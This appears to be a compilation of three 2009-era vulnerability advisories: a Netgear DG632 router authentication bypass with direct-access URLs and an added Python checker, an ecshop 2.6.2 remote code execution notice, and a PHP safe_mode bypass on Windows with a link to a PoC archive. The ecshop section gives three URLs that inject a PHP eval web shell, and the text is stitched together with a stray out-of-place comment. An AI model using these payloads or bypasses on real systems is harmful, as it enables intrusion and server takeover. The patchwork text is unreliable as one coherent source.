This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on, this information.
Permission is hereby granted for the redistribution of this alert,
provided that the content is not altered in any way, except
reformatting, and that due credit is given.
This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html
# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke
Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk >
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009
I. DESCRIPTION
The Netgear DG632 router has a web interface which runs on port 80.
This allows an admin to log in and administer the device's settings.
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an attacker to access files and data without
authentication.
II. DETAILS
The "webcm" script handles user authentication and attempts to load
"indextop.htm" (via javascript below). The "indextop.htm" page requires
authentication (HTTP Basic Authorization).
—
<script language="javascript" type="text/javascript">
function loadnext() {
//document.forms[0].target.value="top";
document.forms[0].submit();
//top.location.href="../cgi-bin/webcm?nextpage=../html/indextop.htm";
}</script></head>
<body bgcolor="#ffffff" onload="loadnext()" >
Loading file …
<form method="POST" action="../cgi-bin/webcm" id="uiPostForm">
<input type="hidden" name="nextpage" value="../html/indextop.htm" id="uiGetNext">
</form>
—
If a valid password to the default "admin" user is supplied, the script
then continues to load the "indextop.htm" page and continues to load the
other frames based on a hidden field. If user authentication is
unsuccessful, the user is returned back to "../cgi-bin/webcm". It is
possible to bypass the "webcm" script and access specific files directly
without the need for authentication.
Normal use:
http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm
This would ask for the user to authenticate and would refuse access to
this file if authentication details were not known. All the script is
doing is making sure authentication is forced upon the user. The same
"stattbl.htm" file can be accessed without having to provide any
authentication using the following URL:
http://TARGET_IP/html/stattbl.htm
Another example:
http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm
(returns 401 – Forbidden)
Bypassing the "webcm" script:
http://192.168.0.1/html/modemmenu.htm
(returns 200 – OK)
In the example above (modemmenu.htm), the full source can be viewed,
which discloses further directories and files within the JavaScript of
the page. A sample of the files disclosed within modemmenu.htm and available
to download is:
/html/onload.htm
/html/form.css
/gateway/commands/saveconfig.html
/html/utility.js (full source)
There are many other files accessible by calling them directly
instead of going via the "webcm" script; the above are just a sample. In
addition, it is possible to pass arbitrary paths to the "webcm" script as shown
below:
http://TARGET_IP/cgi-bin/webcm?nextpage=../../
This allows an attacker to enumerate which files and directories exist
within the www root directory and beyond, using the 200, 403 and 404
responses as a guide.
Affected Versions: Firmware V3.4.0_ap (others unknown)
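The check described in the details above, written out as an added example (this is not code from the advisory or from Netgear): each page is requested once through the "webcm" front door and once by its direct path, the pair where the front door answers 401 but the direct path answers 200 is flagged as a bypass, and a list of candidate paths is probed so the 200/403/404 responses can be read as an existence map. The address 192.168.0.1 and the page list come from the advisory; the simulated_dg632 responder is a constructed stand-in that answers the way the advisory describes the device, so the script runs offline, and is not a capture from real firmware.

```python
"""Added example: does an embedded web UI enforce authentication only at its CGI
front door (/cgi-bin/webcm) while the pages it loads are served unauthenticated
when requested by their real path?  Not code from the advisory or the vendor."""

import urllib.error
import urllib.request
from urllib.parse import urlsplit

# Pages the advisory names as reachable without credentials on the DG632.
KNOWN_PAGES = [
    "/html/stattbl.htm",
    "/html/modemmenu.htm",
    "/html/onload.htm",
    "/html/form.css",
    "/html/utility.js",
    "/gateway/commands/saveconfig.html",
]


def fetch_status(url, timeout=5):
    """GET url and return the HTTP status code; 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "webcm-bypass-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def check_page(base, page, fetch=fetch_status):
    """Request page through webcm and directly; report whether the direct path skips auth."""
    via_webcm = fetch(f"{base}/cgi-bin/webcm?nextpage=..{page}")
    direct = fetch(f"{base}{page}")
    return {
        "page": page,
        "via_webcm": via_webcm,
        "direct": direct,
        # Auth demanded at the front door, but 200 for the same file by its real path.
        "bypass": via_webcm == 401 and direct == 200,
    }


def probe(base, candidates, fetch=fetch_status):
    """Status per candidate path; 200/403/404 reveal which files and directories exist.
    Point it at f"{base}/cgi-bin/webcm?nextpage=..{path}" instead to enumerate via webcm."""
    return {path: fetch(f"{base}{path}") for path in candidates}


def simulated_dg632(url):
    """Constructed stand-in that answers the way the advisory describes the device.
    Assumption for offline use only; not a capture from real firmware."""
    path = urlsplit(url).path
    if path == "/cgi-bin/webcm":
        return 401          # webcm demands HTTP Basic credentials
    if path in KNOWN_PAGES:
        return 200          # the same page is served without auth when addressed directly
    return 404


if __name__ == "__main__":
    base = "http://192.168.0.1"          # the advisory's example address
    for page in KNOWN_PAGES:
        print(check_page(base, page, fetch=simulated_dg632))
    # "/html/does-not-exist.htm" is a constructed name used to show a 404.
    print(probe(base, ["/html/utility.js", "/html/does-not-exist.htm"], fetch=simulated_dg632))
```

Against a real device, drop the fetch= argument so the default fetch_status is used; any page that comes back as bypass=True is content the front door was supposed to protect.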
III. VENDOR RESPONSE
12 June, 2009 – Contacted vendor.
15 June, 2009 – Vendor responded. Stated the DG632 is an end of life
product and is no longer supported in a production and development
sense, as such, there will be no further firmware releases to resolve
this issue.
IV. CREDIT
Discovered by Tom Neaves
ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities
######################### Securitylab.ir ########################
# Application Info:
# Name: ecshop
# Version: 2.6.2
# Website: http://www.ecshop.com
#################################################################
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info@securitylab[dot]ir & K4mr4n_st@yahoo.com
#################################################################
#===========================================================
# :: integrate.php ::
#
# if ($_REQUEST['act'] == 'sync')
# {
# $size = 100;
# ......
# $tasks = array();
# if ($task_del > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>');
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
# $del_list = $db->getCol($sql);//$del_list
# }
# if ($task_rename > 0)
# {
# $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');
# $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
# $rename_list = $db->getAll($sql);//$rename_list
# }
# if ($task_ignore >0)
# {
# $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
# $ignore_list = $db->getCol($sql);//$ignore_list
# }
# ....
# $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
# $log = '';
# if (isset($del_list))
# {
# $log .= '$del_list=' . var_export($del_list,true) . ';';
# }
# if (isset($rename_list))
# {
# $log .= '$rename_list=' . var_export($rename_list, true) . ';';
# }
# if (isset($ignore_list))
# {
# $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
# }
# fwrite($fp, $log);
# fclose($fp);
# $smarty->assign('tasks', $tasks);
# $smarty->assign('ur_here',$_LANG['user_sync']);
# $smarty->assign('size', $size);
# $smarty->display('integrates_sync.htm');
# }
#
#
# http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
Title : PHP <= 5.2.9 SafeMod Bypass Vulnerability (win32)
Affected Version : Tested on 5.2.8 and 5.2.6; earlier versions may also be affected
Vendor Site : www.php.net
Vulnerability Discovered by : www.abysssec.com
Description :
This is another safe_mode bypass in PHP <= 5.2.9 on Windows. The problem
comes from the interaction between PHP's path handling and the directory
semantics of the operating system: PHP does not account for the difference
between directory path syntax on Linux and on Windows, and this lets an
attacker execute commands on the target machine even with safe_mode
enabled in php.ini.
Vulnerability :
On Linux, when you want to open a directory, for example the php directory,
you go to /usr/bin/php; \usr\bin\php is not a valid path. Windows, however,
does not distinguish between the slash and the backslash, so c:\php and c:/php
name the same directory. That is not a vulnerability by itself, but because
PHP's safe_mode checks assume the Unix convention, a path containing "\"
passed to a function such as exec() can escape the safe_mode restrictions.
Note that safe_mode was never a security boundary the PHP project stood behind:
it was deprecated in PHP 5.3.0 and removed in 5.4.0, so the durable fix is to
not rely on it at all.
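The separator mismatch described above, as an added example that is not the advisory's PoC and does not run any PHP: a filter that only knows "/" as a separator is modelled with posixpath, and the same path is resolved with Windows rules via ntpath to show where it actually lands. The C:/php base directory is an assumed safe_mode-style root, and unix_style_allowed / windows_aware_allowed / classify are hypothetical names chosen for this example, not PHP internals.

```python
"""Added example: why a path filter written for Unix separators fails on Windows.
Hypothetical helpers; C:/php is an assumed safe_mode-style root, not a real setting."""

import ntpath
import posixpath

BASE = "C:/php"  # assumed directory the filter is meant to confine file access to


def unix_style_allowed(path):
    """Filter that only understands '/' as a separator (the behaviour the advisory describes).
    posixpath.normpath collapses 'a/../b' but treats 'a\\..\\b' as one opaque component."""
    norm = posixpath.normpath(path)
    return norm == BASE or norm.startswith(BASE + "/")


def windows_aware_allowed(path):
    """Normalise with Windows rules first ('\\' and '/' both separate, names are
    case-insensitive); only then is a prefix comparison against the base meaningful."""
    base = ntpath.normcase(ntpath.normpath(BASE))
    norm = ntpath.normcase(ntpath.normpath(path))
    return norm == base or norm.startswith(base + ntpath.sep)


def windows_resolves_to(path):
    """Where Windows would actually open the path once both separators are honoured."""
    return ntpath.normpath(path)


def classify(path):
    """Summarise how the two filters treat a path and whether the Unix-style one is escaped."""
    unix_ok = unix_style_allowed(path)
    win_ok = windows_aware_allowed(path)
    return {
        "path": path,
        "unix_style_allows": unix_ok,
        "windows_aware_allows": win_ok,
        "resolves_to": windows_resolves_to(path),
        "escape": unix_ok and not win_ok,  # filter says yes, OS lands outside BASE
    }


if __name__ == "__main__":
    for p in (
        "C:/php/php.exe",                         # legitimate, both filters agree
        "C:/php/../windows/system32/cmd.exe",     # forward-slash traversal, caught by both
        "C:/php/..\\windows\\system32\\cmd.exe",  # backslash traversal slips past the Unix-style filter
        "c:/PHP/ext/php_curl.dll",                # legitimate, but the case-sensitive filter rejects it
    ):
        print(classify(p))
```

The third path is the advisory's case: the Unix-style filter sees a single component "..\windows\system32\cmd.exe" under C:/php and allows it, while Windows resolves it to C:\windows\system32\cmd.exe. The fourth shows the same filter failing in the other direction, so the fix is normalisation with the target OS's rules before any prefix check, not more string matching.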
PoC / Exploit :
original : www.abysssec.com/safemod-windows.zip
mirror : www.milw0rm.com/sploits/2009-safemod-windows.zip
note : this vulnerability is published for educational purposes only, to show that the issue exists;
the author is not responsible for any damage caused by using it.
for more information visit Abysssec.com
feel free to contact me at admin [at] abysssec.com